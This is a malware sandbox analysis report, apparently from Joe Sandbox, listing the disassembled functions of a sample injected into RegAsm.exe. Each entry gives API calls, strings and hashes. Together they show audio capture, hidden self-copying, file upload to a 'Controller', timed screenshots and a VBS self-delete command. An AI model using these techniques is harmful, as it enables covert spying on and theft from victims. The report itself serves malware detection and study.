                                                  • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                  • Opcode Fuzzy Hash: 5423d87cc751ed5cfd1d4c8b3581599aeeb643011f75056a7ca0d89747c9c64e
                                                  • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                  Function 0041B0D8 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                  • SetEvent.KERNEL32 ref: 0041B2AA
                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                  • CloseHandle.KERNEL32 ref: 0041B2CB
                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                  • API String ID: 738084811-2094122233
                                                  • Opcode ID: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
                                                  • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                  • Opcode Fuzzy Hash: e27b3f9eba018f8ca3c324594b7161069c0f951711efb11517c4a8cfdc535e62
                                                  • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                  Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                  • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                  • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                  • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Write$Create
                                                  • String ID: RIFF$WAVE$data$fmt
                                                  • API String ID: 1602526932-4212202414
                                                  • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                  • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                  • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                  • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                  Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                  • API String ID: 1646373207-255920310
                                                  • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                  • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                  • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                  • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                  Function 0040CE34 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0040CE42
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                                  • _wcslen.LIBCMT ref: 0040CF21
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                  • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000), ref: 0040CFBF
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                  • _wcslen.LIBCMT ref: 0040D001
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                  • ExitProcess.KERNEL32 ref: 0040D09D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                  • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                  • API String ID: 1579085052-2309681474
                                                  • Opcode ID: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
                                                  • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                  • Opcode Fuzzy Hash: 283c2ff4283ef6ea14c9631ac3abc3b8d6689ce6a044c306617b0cf23f9fad85
                                                  • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                  Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                  • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                  • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                  • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                  • _wcslen.LIBCMT ref: 0041C1CC
                                                  • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                  • GetLastError.KERNEL32 ref: 0041C204
                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                  • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                  • GetLastError.KERNEL32 ref: 0041C261
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                  • String ID: ?
                                                  • API String ID: 3941738427-1684325040
                                                  • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                  • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                  • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                  • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                  Function 0044F4AD Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$EnvironmentVariable$_wcschr
                                                  • String ID:
                                                  • API String ID: 3899193279-0
                                                  • Opcode ID: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                                  • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                  • Opcode Fuzzy Hash: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                                  • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                  Function 00412AEF Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6C7C8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                  • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                  • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                  • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                  • String ID: /stext "$0TG$0TG$NG$NG
                                                  • API String ID: 1223786279-2576077980
                                                  • Opcode ID: cd98076cbd31d0c1f17db76443358eb0b8c5969c5226cb19c20294b0481241c1
                                                  • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                  • Opcode Fuzzy Hash: cd98076cbd31d0c1f17db76443358eb0b8c5969c5226cb19c20294b0481241c1
                                                  • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                  Function 00414DC1 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                  • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                  • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                  • API String ID: 2490988753-744132762
                                                  • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                  • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                  • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                  • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                  Function 0041C720 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                                  • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnumOpen
                                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                  • API String ID: 1332880857-3714951968
                                                  • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                  • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                  • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                  • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                  Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                  • GetCursorPos.USER32(?), ref: 0041D67A
                                                  • SetForegroundWindow.USER32(?), ref: 0041D683
                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                  • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                  • ExitProcess.KERNEL32 ref: 0041D6F6
                                                  • CreatePopupMenu.USER32 ref: 0041D6FC
                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                  • String ID: Close
                                                  • API String ID: 1657328048-3535843008
                                                  • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                  • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                  • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                  • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                  Function 00445DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  • Opcode ID: d4b587b978178a04d77a312406460529d21981b93c8e51504b7a0db7e668213d
                                                  • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                  • Opcode Fuzzy Hash: d4b587b978178a04d77a312406460529d21981b93c8e51504b7a0db7e668213d
                                                  • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                  Function 00408BB5 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                  • __aulldiv.LIBCMT ref: 00408D88
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                  • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                  • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                  • API String ID: 3086580692-2582957567
                                                  • Opcode ID: 4f195d3c0c62a6e45262181e9b7fb43f1a1b55c9fe98746a0176ab88057bb64b
                                                  • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                  • Opcode Fuzzy Hash: 4f195d3c0c62a6e45262181e9b7fb43f1a1b55c9fe98746a0176ab88057bb64b
                                                  • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                  Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                  • _free.LIBCMT ref: 0045137F
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 004513A1
                                                  • _free.LIBCMT ref: 004513B6
                                                  • _free.LIBCMT ref: 004513C1
                                                  • _free.LIBCMT ref: 004513E3
                                                  • _free.LIBCMT ref: 004513F6
                                                  • _free.LIBCMT ref: 00451404
                                                  • _free.LIBCMT ref: 0045140F
                                                  • _free.LIBCMT ref: 00451447
                                                  • _free.LIBCMT ref: 0045144E
                                                  • _free.LIBCMT ref: 0045146B
                                                  • _free.LIBCMT ref: 00451483
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                  • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                  • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                  • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                  Function 0041A045 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0041A04A
                                                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                  • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                  • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                  • API String ID: 489098229-1431523004
                                                  • Opcode ID: 9ca3d8a5fd9104a035863b57295875439c18cda5a03c1d5b6dbcacfb627d70fe
                                                  • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                  • Opcode Fuzzy Hash: 9ca3d8a5fd9104a035863b57295875439c18cda5a03c1d5b6dbcacfb627d70fe
                                                  • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                  Function 0040D83A Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                    • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                    • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                    • Part of subcall function 00413733: RegCloseKey.ADVAPI32(00000000), ref: 00413773
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                  • ExitProcess.KERNEL32 ref: 0040D9FF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                  • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                  • API String ID: 1913171305-3159800282
